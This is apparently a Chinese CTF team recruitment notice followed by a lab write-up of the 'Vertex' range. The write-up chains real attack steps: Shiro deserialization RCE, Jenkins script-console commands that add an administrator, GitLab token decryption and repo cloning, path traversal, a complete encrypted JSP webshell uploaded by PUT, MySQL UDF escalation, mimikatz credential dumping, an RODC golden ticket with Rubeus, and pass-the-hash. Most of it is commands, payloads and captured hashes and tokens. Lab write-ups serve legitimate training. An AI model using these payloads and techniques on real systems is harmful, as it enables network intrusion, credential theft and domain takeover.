招新

N0wayBack

-招新说明-

招新要求

· CTF赛龄1年以上

· 热爱网络安全，喜欢CTF

· 无人际交流障碍，不以阴阳怪气为乐；乐于奉献、热爱分享，愿意提升   自己同时帮助他人

· 时间允许参加各类赛事，服从战队管理与安排

· 各类比赛获奖者、能力出众者视情况考量

· 未参与其他高校联队

· 大一同学视情况放宽资历要求

联系方式

发送简历于邮箱

· 简历邮箱：[email protected]

招

春秋云境-Vertex

速通纪念。

前期信息收集

8.130.146.122:80 open8.130.146.122:1433 open8.130.146.122:2383 open8.130.146.122:3389 open8.130.146.122:8000 open8.130.146.122:8172 open8.130.146.122:16453 open8.130.146.122:16452 open8.130.146.122:16450 open8.130.146.122:16451 open8.130.146.122:17001 open8.130.146.122:47001 open8.130.146.122:49665 open8.130.146.122:49664 open8.130.146.122:49666 open8.130.146.122:49667 open8.130.146.122:49669 open8.130.146.122:49668 open8.130.146.122:49670 open8.130.146.122:49680 open[*] alive ports len is: 20start vulscan[*] WebTitle http://8.130.146.122      code:200 len:43679  title:VertexSoft[*] WebTitle http://8.130.146.122:47001 code:404 len:315    title:Not Found[*] WebTitle https://8.130.146.122:8172 code:404 len:0      title:None[*] WebTitle http://8.130.146.122:8000 code:200 len:4018   title:Modbus Monitor - VertexSoft Internal Attendance System39.101.72.198:84 open39.101.72.198:22 open39.101.72.198:8080 open39.101.72.198:10000 open[*] alive ports len is: 4start vulscan[*] WebTitle http://39.101.72.198:8080 code:302 len:0      title:None 跳转url: http://39.101.72.198:8080/login;jsessionid=FC5DFD503FC5E05632FD0905B692A5F4[*] WebTitle http://39.101.72.198:8080/login;jsessionid=FC5DFD503FC5E05632FD0905B692A5F4 code:200 len:1383   title:Master ERP login Form[+] PocScan http://39.101.72.198:8080 poc-yaml-spring-actuator-heapdump-file[+] PocScan http://39.101.72.198:8080 poc-yaml-springboot-env-unauth spring2

flag1

heapdump信息泄露shirokey，shiro反序列化RCE

访问actuator/heapdump下载文件，工具解密得到key

shiro工具rce即可

根目录拿到第一个flag

这里shiro不出网，只能正向上线，代理也只能用正向代理（我这里用的gost）

内网信息收集

192.168.8.42:22 open192.168.8.146:22 open192.168.8.12:53 open192.168.8.42:80 open192.168.8.9:80 open192.168.8.12:88 open192.168.8.146:84 open192.168.8.26:135 open192.168.8.16:135 open192.168.8.12:135 open192.168.8.38:135 open192.168.8.9:135 open192.168.8.26:139 open192.168.8.16:139 open192.168.8.38:139 open192.168.8.12:139 open192.168.8.9:139 open192.168.8.12:389 open192.168.8.12:464 open192.168.8.26:445 open192.168.8.16:445 open192.168.8.38:445 open192.168.8.9:445 open192.168.8.12:445 open192.168.8.12:593 open192.168.8.12:636 open192.168.8.9:1433 open192.168.8.9:2383 open192.168.8.12:3268 open192.168.8.12:3269 open192.168.8.38:3306 open192.168.8.12:3389 open192.168.8.9:3389 open192.168.8.38:3389 open192.168.8.26:3389 open192.168.8.16:3389 open192.168.8.9:8000 open192.168.8.42:8060 open192.168.8.146:8080 open192.168.8.16:8080 open192.168.8.26:8080 open192.168.8.9:8172 open192.168.8.42:9094 open192.168.8.12:9389 open192.168.8.9:16450 open192.168.8.9:16451 open192.168.8.9:16452 open192.168.8.9:16453 open192.168.8.9:17001 open192.168.8.38:33060 open192.168.8.12:47001 open192.168.8.38:47001 open192.168.8.9:47001 open192.168.8.16:47001 open192.168.8.26:47001 open192.168.8.12:49664 open192.168.8.9:49664 open192.168.8.16:49664 open192.168.8.38:49664 open192.168.8.26:49664 open192.168.8.12:49665 open192.168.8.16:49665 open192.168.8.9:49665 open192.168.8.38:49665 open192.168.8.26:49665 open192.168.8.12:49666 open192.168.8.16:49666 open192.168.8.38:49666 open192.168.8.9:49666 open192.168.8.26:49666 open192.168.8.12:49667 open192.168.8.16:49667 open192.168.8.9:49667 open192.168.8.38:49667 open192.168.8.26:49667 open192.168.8.12:49668 open192.168.8.16:49668 open192.168.8.9:49668 open192.168.8.38:49668 open192.168.8.26:49668 open192.168.8.16:49669 open192.168.8.9:49669 open192.168.8.38:49669 open192.168.8.26:49669 open192.168.8.9:49670 open192.168.8.16:49670 open192.168.8.38:49671 open192.168.8.26:49671 open192.168.8.16:49675 open192.168.8.26:49676 open192.168.8.38:49677 open192.168.8.9:49680 open192.168.8.12:51757 open192.168.8.12:54183 open192.168.8.12:54184 open192.168.8.12:54190 open192.168.8.12:54200 open192.168.8.12:54231 open192.168.8.12:54251 open192.168.8.12:54281 open[*] NetInfo:[*]192.168.8.26   [->]WIN-PC3788   [->]192.168.8.26[*] NetInfo:[*]192.168.8.38   [->]WIN-OPS88   [->]192.168.8.38[*] NetInfo:[*]192.168.8.9   [->]WIN-IISSERER   [->]192.168.8.9[*] NetInfo:[*]192.168.8.12   [->]RODC   [->]192.168.8.12[*] NetInfo:[*]192.168.8.16   [->]WIN-SERVER03   [->]192.168.8.16[*] WebTitle: http://192.168.8.9        code:200 len:43679  title:VertexSoft[*] NetBios: 192.168.8.26    WORKGROUPWIN-PC3788           [*] NetBios: 192.168.8.12    [+]DC VERTEXSOFTRODC          [*] NetBios: 192.168.8.16    WORKGROUPWIN-SERVER03         [*] NetBios: 192.168.8.38    WORKGROUPWIN-OPS88            [*] NetBios: 192.168.8.9     WORKGROUPWIN-IISSERER         [*] WebTitle: http://192.168.8.42       code:302 len:99     title:None 跳转url: http://192.168.8.42/users/sign_in[*] WebTitle: http://192.168.8.38:47001 code:404 len:315    title:Not Found[*] WebTitle: http://192.168.8.146:8080 code:302 len:0      title:None 跳转url: http://192.168.8.146:8080/login;jsessionid=808957894EEBA788A827EFE55BE0FF5C[*] WebTitle: http://192.168.8.9:8000   code:200 len:4018   title:Modbus Monitor - VertexSoft Internal Attendance System[*] WebTitle: http://192.168.8.42:8060  code:404 len:555    title:404 Not Found[*] WebTitle: http://192.168.8.12:47001 code:404 len:315    title:Not Found[*] WebTitle: http://192.168.8.26:47001 code:404 len:315    title:Not Found[*] WebTitle: http://192.168.8.9:47001  code:404 len:315    title:Not Found[*] WebTitle: https://192.168.8.9:8172  code:404 len:0      title:None[*] WebTitle: http://192.168.8.146:8080/login;jsessionid=808957894EEBA788A827EFE55BE0FF5C code:200 len:1383   title:Master ERP login Form[*] WebTitle: http://192.168.8.26:8080  code:200 len:147    title:第一个 JSP 程序[*] WebTitle: http://192.168.8.16:47001 code:404 len:315    title:Not Found[*] WebTitle: http://192.168.8.42/users/sign_in code:200 len:11166  title:登录 · GitLab[*] WebTitle: http://192.168.8.16:8080  code:403 len:594    title:None[+] mysql:192.168.8.38:3306:root 123456[+] http://192.168.8.146:8080 poc-yaml-spring-actuator-heapdump-file[+] http://192.168.8.146:8080 poc-yaml-springboot-env-unauth spring2

东西比较多，下面先打一下8.16的jenkins

flag2

访问下面这个路由可以直接执行脚本RCE

http://192.168.8.16:8080/manage/script

添加用户上去拿flag即可

println "net user Chu0 whoami@666 /add".execute().textprintln "net localgroup administrators Chu0 /add".execute().text

administrator下可以找到flag

flag3

jenkins里面有一个gitlab的key

可以解密得到明文

println(hudson.util.Secret.fromString("{AQAAABAAAAAgvBTIIfz3QQnmD8y+ncKsVDqTEsdqjxdp/rkK9tRPkckOfP9xBtu6uqckTjQJ6gJj}").getPlainText())

带上token访问gitlab获取项目信息

curl --header "PRIVATE-TOKEN:glpat-bGEgHAJDvwaPP78rsLeS""http://192.168.8.42/api/v4/projects"

拉取项目源码

git clone http://192.168.8.42:[email protected]/vertexsoft/vertexsoftbackup.gitgit clone http://192.168.8.42:[email protected]/vertexsoft/hexo.gitgit clone http://192.168.8.42:[email protected]/vertexsoft/vertexapp.gitgit clone http://192.168.8.42:[email protected]/vertexsoft/erp_old.gitgit clone http://192.168.8.42:[email protected]/vertexsoft/portalcode.git

可以在vertexsoftbackup的backup.txt里面拿到一个flag

flag4

继续审计拉取的项目portalcode，可以发现如下信息

这里存在一个被隐藏了的sqlserver的密码，这个源码其实就是另一个入口的源码，我们回到另一个入口，随便注册一个用户，发现有个页面需要admin权限才能访问

回到注册界面抓包，修改role为admin

访问之前访问不到的界面，点击export可以导出一个列表

通过修改文件名实现任意文件读取拿到sqlserver的密码

/User/DownloadFile?download=Export&fileName=../Web.Config

MDUT连接即可shell

需要提权，上传甜土豆即可，得随便找个工具免杀一下，有杀软

老样子，添加用户rdp找flag即可

flag5

PUT /backup/upload/index1.jsp HTTP/1.1Host: 192.168.8.26:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=A377FCF0DA5A1767C46C7478027926F9; JSESSIONID=0F908F3AE0576C6145257C8E9395272CConnection: close<%@page import="java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*" %><%!private byte[] Decrypt(byte[] data) throws Exception{    String key="e45e329feb5d925b";for (int i = 0; i < data.length; i++) {        data[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15]));    }return data;}%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return        super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){            ByteArrayOutputStream bos = new ByteArrayOutputStream();            byte[] buf = new byte[512];            int length=request.getInputStream().read(buf);while (length0)            {                byte[] data= Arrays.copyOfRange(buf,0,length);                bos.write(data);                length=request.getInputStream().read(buf);            }            out.clear();            out=pageContext.pushBody();        new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);}%>

冰蝎连接即可，还是需要提个权，用跟上面那个一样的即可

flag6

mysql弱口令+udf还可以shell一个，这里环境比较卡，等等就好了

老样子，创建用户，RDP上去找flag即可

flag7

在拿下的mysql机器的管理员目录里有一个csv，里面有一些账户信息

可以直接用cme跑一遍

proxychains4 crackmapexec smb 192.168.8.12 -u user.txt -p pass.txt -d VERTEXSOFT 2>/dev/null

可以看到这里确实是有这几个用户的，但是都需要修改密码，我们利用xfreerdp先连接

proxychains4  rdesktop 192.168.8.12

修改密码即可rdp成功，这台机器是RODC，后面最后一个flag在DC上

flag8

参考文档：https://blog.csdn.net/dzqxwzoe/article/details/132020707

信息收集

mimikatz.exe "Log""Privilege::Debug""lsadump::lsa /patch""exit"

可以得到krbtgt_4156的哈希，至于这个用户是怎么来的看博客分析，还可以得到当前域的sid

清除 msDS-NeverRevealGroup 属性

Set-DomainObject -Identity 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Clear 'msDS-NeverRevealGroup'

将域管理员添加到 msDS-RevealOnDemandGroup 属性

Set-DomainObject -Identity 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Set @{'msDS-RevealOnDemandGroup'=@('CN=Administrator,CN=Users,DC=vertexsoft,DC=local')} 

构造黄金票据

Rubeus.exe golden /rodcNumber:4156 /rc4:34e335179246ef930dc33fd1e3de6e9e /user:administrator /id:500 /domain:vertexsoft.local /sid:S-1-5-21-1670446094-1720415002-1380520873

获取要伪造的用户哈希

Rubeus.exe asktgs /enctype:rc4 /keyList /service:krbtgt/vertexsoft.local /dc:DC.vertexsoft.local /ticket:doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELio116n1GGurW3ynU7bO17YadTbyQ+EwrJ32xSy/SHLPw8By8xr0o7I7zWJ31TnzywBxQwc6/NKpRresdwnbrQJq0eqBkcfFWxUhkIfuTcEpJfoSkpKz/e+YlLd5LYE8Z4F3ZAjgudpOADi/eooRCWrnJg5NeWuGQ66vyljyQHJg4etsQ06wqV90C0iJAj+00sdMVvoqkhXj+UAueA0e0DT31aXQJr2oJPFTHT6rO00SkWJMAQLshKNCjYUBWMuIQXwSHBIufMMHm68OaCrV8s0ZQ3r/n2hXlOc5xfNtvI+XY7cssWXGfwcvtzXOlBmyjBll94KMQ2EFpCI+O2wy3cwjfIEs8JkrnHynC/VT0guZB3ltf1NIiLGW4oF7gvHxQMEvqYs8Bjr4kvhJBe3Ui7tjEnaS/5/D9EikbCYuWpilGDab7PBvGuYKRy0/mZuB147GcsJCutTaGfu7/ShtcAobGmTSvmdhgj5lrOmSFU6Q4XfSGCenP1vlLCWqZhLvI8YLQQrUtiei75jw/zZYHU6YJQKLlzdKy6sA8DiHyk0e5SkBW+Sy5f1nbPyQhZdfx+OuS1uBAcv2v/DnuZI4gJy5zZdu1RWsApCcJrxxNwxe9oBfzrp0Z9w+GojoUDiCJkIrs68FkajDmkpWEePp87PLZrbQ2grnZqoYnd/Xpcj8KQcrlLQ/Lg9zgJdKQOUVk3xbYlFEfZBN2z5iJsQq6mEfW3xBUD0DHs321YMAGYgoyL2bcAzB9QttXDmHlSYJTZMHOgxnOAsXw71IhBOgUf7jhcoQ73bMLZypmfDaYR8+bKovsq99mTB7+iIMA1fbKI+jN01m7iuBgcWapABWuQLmkl8F3bd/TnmPrCljOHsyID7CN8vX6MMWZ6LataIZmwFHoSnmUUkt3Z6CLcWRboELB71RsZQIl+yOg9/I+HbSlEkyWrqNMuxh9xcKFECRgnt/M11YUsojCUkyS+VVxMrwxsBZ+ybR7rSo/N6lczaPps6YXqhrDueClCtrnV5m20by2zSMsdRdThT35rtepBQHNRFLcAmazc5I9z49h0H39a1bdFPahaiMJ4dtfySN+ubH+OYhaFZe0zF/lkkuXDHX5H56xOt+bcNWBxTxr9uOCVunh7FkMglbvNUW59spFk789kAOp5pxndiQu4w00cek1+1BoE2Bt9BffLZj/4Uo25FCFCCgFkm+/aKIxhlZNLA/OzRKWffh0ST6m7jMTEvQfXedWiBJkGrAwSE0WcdQyA/k/wqSBedXU8aOP2oGDa6y2Qrz5TIXA7/XgGGiUAUDlClwNXUF2+1gIdPyjA5gT856ybzQkbgQX5Q5IhKsSXb1GIKvD3zCeOdV9hijEJDwTpbA+McoKaHOmo84/Dep0C/KDXdPVvRu7EDlLEc2J+7P2R/jRy67vzfjICqKo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQX9nUas8Rbey7gKNVXduUiKESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNYWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI1MDUyODEwMTEzOFqlERgPMjAyNTA1MjgxMDExMzhaphEYDzIwMjUwNTI4MjAxMTM4WqcRGA8yMDI1MDYwNDEwMTEzOFqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==

PTH过去即可

proxychains4 impacket-smbexec -hashes :EBC447441306783742EE3DF769051B75 VERTEXSOFT.LOCAL/[email protected]